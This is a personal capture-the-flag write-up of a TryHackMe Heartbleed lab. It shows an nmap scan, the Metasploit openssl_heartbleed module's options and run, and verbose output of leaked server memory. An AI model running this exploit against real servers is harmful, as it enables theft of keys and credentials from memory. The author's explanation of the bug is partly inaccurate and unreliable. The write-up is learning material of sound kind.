https://tryhackme.com/room/heartbleed
💭 Thoughts after doing the room
It’s just a one step room, but I think hearbleed is really interesting. That it was possible to get memory contents from a server without any user interaction and just any SSL service open to the internet is mindblowing.
I think I read somehwere that this bug was in the wild for around 2 years before it was fixed. Imagine the potential damage. I hope bugs like that are really rare.
Task 1: Background information
I read the background information again and I think I understood the broad concept that there is a mechanism to keep a SSL connection alive. Usually the client send data to the server, but when the client doesn’t send a payload the server then replies with arbritary memory that you can use to get data.
Task 2: Protecting Data In Transit
Because the room is named heartbleed we could just jump straight ahaid to exploit attempt, but let’s first see if there is something else.
root@ip-10-10-24-237:~# nmap -T4 54.216.33.66
Starting Nmap 7.60 ( https://nmap.org ) at 2023-03-29 21:10 BST
Nmap scan report for ec2-54-216-33-66.eu-west-1.compute.amazonaws.com (54.216.33.66)
Host is up (0.00083s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 1.65 seconds
Port 80 and 443 are the interesting ones and there is a page with a video hosted.
With no further hint, I’ll just start metasploit to try the heartbleed scanner.
For the first try I didn’t see that this module also has a verbose option. After some digging I saw it and now I could set the right options.
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set RHOSTS 54.216.33.66
RHOSTS => 54.216.33.66
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set verbose true
verbose => true
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > show options
Module options (auxiliary/scanner/ssl/openssl_heartbleed):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMPFILTER no Pattern to filter leaked memory before storing
LEAK_COUNT 1 yes Number of times to leak memory per SCAN or DUMP invocation
MAX_KEYTRIES 50 yes Max tries to dump key
RESPONSE_TIMEOUT 10 yes Number of seconds to wait for a server response
RHOSTS 54.216.33.66 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
STATUS_EVERY 5 yes How many retries until key dump status
THREADS 1 yes The number of concurrent threads (max one per host)
TLS_CALLBACK None yes Protocol to use, "None" to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES)
TLS_VERSION 1.0 yes TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2)
Auxiliary action:
Name Description
---- -----------
SCAN Check hosts for vulnerability
View the full module info with the info, or info -d command.
Now for the exploit, when you execute it, you’ll get something like this in verbose mode
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > exploit
[*] 54.216.33.66:443 - Leaking heartbeat response #1
[*] 54.216.33.66:443 - Sending Client Hello...
[*] 54.216.33.66:443 - SSL record #1:
[*] 54.216.33.66:443 - Type: 22
[*] 54.216.33.66:443 - Version: 0x0301
[*] 54.216.33.66:443 - Length: 86
[*] 54.216.33.66:443 - Handshake #1:
[*] 54.216.33.66:443 - Length: 82
[*] 54.216.33.66:443 - Type: Server Hello (2)
[*] 54.216.33.66:443 - Server Hello Version: 0x0301
[*] 54.216.33.66:443 - Server Hello random data: 6e963c439bd0e8eff72c7a096723205f68a16275e5878eed50b1a12fed019ed1
[*] 54.216.33.66:443 - Server Hello Session ID length: 32
[*] 54.216.33.66:443 - Server Hello Session ID: ce1e8f372e8ee75f5d53009ad88a817c7a5f39c11616df1b3ef40855c75b4f3f
[*] 54.216.33.66:443 - SSL record #2:
[*] 54.216.33.66:443 - Type: 22
[*] 54.216.33.66:443 - Version: 0x0301
[*] 54.216.33.66:443 - Length: 951
[*] 54.216.33.66:443 - Handshake #1:
[*] 54.216.33.66:443 - Length: 947
[*] 54.216.33.66:443 - Type: Certificate Data (11)
[*] 54.216.33.66:443 - Certificates length: 944
[*] 54.216.33.66:443 - Data length: 947
[*] 54.216.33.66:443 - Certificate #1:
[*] 54.216.33.66:443 - Certificate #1: Length: 941
[*] 54.216.33.66:443 - Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name CN=localhost,OU=TryHackMe,O=TryHackMe,L=London,ST=London,C=UK>, issuer=#<OpenSSL::X509::Name CN=localhost,OU=TryHackMe,O=TryHackMe,L=London,ST=London,C=UK>, serial=#<OpenSSL::BN:0x00007faca9481a90>, not_before=2019-02-16 10:41:14 UTC, not_after=2020-02-16 10:41:14 UTC>
[*] 54.216.33.66:443 - SSL record #3:
[*] 54.216.33.66:443 - Type: 22
[*] 54.216.33.66:443 - Version: 0x0301
[*] 54.216.33.66:443 - Length: 331
[*] 54.216.33.66:443 - Handshake #1:
[*] 54.216.33.66:443 - Length: 327
[*] 54.216.33.66:443 - Type: Server Key Exchange (12)
[*] 54.216.33.66:443 - SSL record #4:
[*] 54.216.33.66:443 - Type: 22
[*] 54.216.33.66:443 - Version: 0x0301
[*] 54.216.33.66:443 - Length: 4
[*] 54.216.33.66:443 - Handshake #1:
[*] 54.216.33.66:443 - Length: 0
[*] 54.216.33.66:443 - Type: Server Hello Done (14)
[*] 54.216.33.66:443 - Sending Heartbeat...
[*] 54.216.33.66:443 - Heartbeat response, 44883 bytes
[+] 54.216.33.66:443 - Heartbeat response with leak, 44883 bytes
[*] 54.216.33.66:443 - Printable info leaked:
......d#qp...j...\..c...k.....ca..}..!..f.....".!.9.8.........5.............................3.2.....E.D...../...A....................................... 🤐.......A2../...........................................................................-........@..................................................................................................................................... repeated 15597 times .....................................................................................................................................@..................................................................................................................................... repeated 16122 times .....................................................................................................................................@
Within the printable info leaked which contains the flag.